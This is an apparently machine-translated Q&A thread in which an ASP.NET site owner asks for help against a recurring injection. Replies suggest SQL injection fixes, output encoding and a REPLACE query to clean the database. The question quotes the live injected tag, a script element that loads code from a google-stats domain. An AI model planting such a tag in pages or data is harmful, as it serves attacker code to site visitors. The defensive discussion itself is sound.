2010-09-23 25 views
5

Estoy en un gran problema. ¡¡¡¡¡¡¡¡¡¡Por favor ayuda!!!!!!!!!!Ataque XSS en el sitio web de ASP.NET

Mi sitio web ha sido atacado por algún script malicioso </title> < script src = http: // google-stats50.info/ur.php>. Este script se agrega a cualquier columna (s) de alguna tabla de forma automática. He eliminado esta secuencia de comandos. Pero después de unas horas, volvió a aparecer en algunas tablas. Pero esta vez es </title> < script src = http: // google-stats49.info/ur.php>.

Mi cliente se queja sobre la secuencia de comandos. La tecnología utilizada es ASP.NET 1.1, SQL SERVER 2005.

Por favor ayuda.

Gracias de antemano !!!!!!

Respuesta

2

Cierre el sitio. Su servidor puede o no estar atornillado ahora.

Usted tiene que averiguar dónde los cambios están viniendo - base de datos o sistema de archivos

Si se trata de la base de datos, entonces puede ser aceptable, alguien probablemente está usando la inyección de SQL. Establezca permisos para que el sitio no pueda actualizar la base de datos hasta que encuentre el punto de INYECCIÓN SQL.

Si es su sistema de archivos, es probable que necesite borrar y restablecer el sitio. Están dentro y no te desharás de ellos. Encuentra tu punto de entrada, pero será difícil.

+1

Además, trate de desinfectar (no permitir HTML/JS) las entradas de los usuarios. – sheeks06

+0

cargamos contenido en un sitio web de terceros a través de la tecnología de secuencias de comandos ... ese es el propósito de mi sitio web ... ¿hay alguna manera de resolverlo lo antes posible – user423719

+0

? Probablemente ya sea demasiado tarde, pero si esto sucede y es lo más Por lo general, necesita contratar un experto. Un experto muy caro – Dann

4

Cuando representa el texto de la base de datos, puede utilizar dos formas de evitar este script.

  1. Usuario Server.HtmlEncode(DataFromDatabase);
  2. Utilice el Microsoft Anti-Cross dll library que tiene una función similar con más opciones.

Last MS Anti-XSS library now es 3.1.
How to using video

Cómo pasan este script.

  1. En el contacto u otras formas.
  2. En la referencia del navegador en las estadísticas y cuando exploran su sitio, mantiene un registro al respecto y cuando visita este registro, se ejecuta el script.

Hope this help.

+0

Ok ... gracias ..... Implementaré estas prevenciones en mi aplicación. Pero, ¿hay alguna solución rápida para eliminar el script? – user423719

+0

No sé cómo están pasando este script e inyectándolo en la base de datos. – user423719

+0

@ user423719 He escrito en mi respuesta dos formas posibles de cómo esto se está inyectando, a partir de los formularios de contacto, o de los datos del navegador que se registran. No elimine la secuencia de comandos, simplemente haga que no se ejecute, luego ubique cómo se ingresa y si lo desea, puede tomar más medidas. – Aristos

0

Recomendaría que elimine todos los enlaces extern del hostheader en el IIS. Eso le permite localizar el problema localmente sin ningún cliente suyo puede estar infectado/ser robado de

0

un remedio rápido

siguiente no es una solución, pero con esto se puede eliminar la secuencia de comandos de la base de datos en una consulta única. Eso es lo que hago por ahora :).


ACTUALIZACIÓN Table_Name SET COLUMN_NAME = REPLACE (CAST (COLUMN_NAME AS nvarchar (MAX)), 'http://google-stats49.info/ur.php> ',' ')


Éste funciona como buscar y reemplazar cosas en word. Si encuentra información sobre el script del virus, publíquelo aquí.

Saludos, Masood

+0

Hola chicos, tengo otro enlace de inyección. Parece que esta siendo inyectada por el mismo bot. No puedo publicar el enlace aquí.book

+0

aparece una y otra vez. He cifrado la información confidencial en el archivo Web.config. Creo que detuvo el script para volver a aparecer durante alrededor de 24 horas. Pero volvió a surgir. Por favor ayuda. – user423719

0

mismo problema aquí ... que comenzaron sobre las 15.30 e infectan 4 mesas ... aquí es la solución para la búsqueda de base de datos completa: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html acaba de editar que vuelva nombres de tablas distintas.

y esto va a funcionar como Masood mencionar

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '') 
Cuestiones relacionadas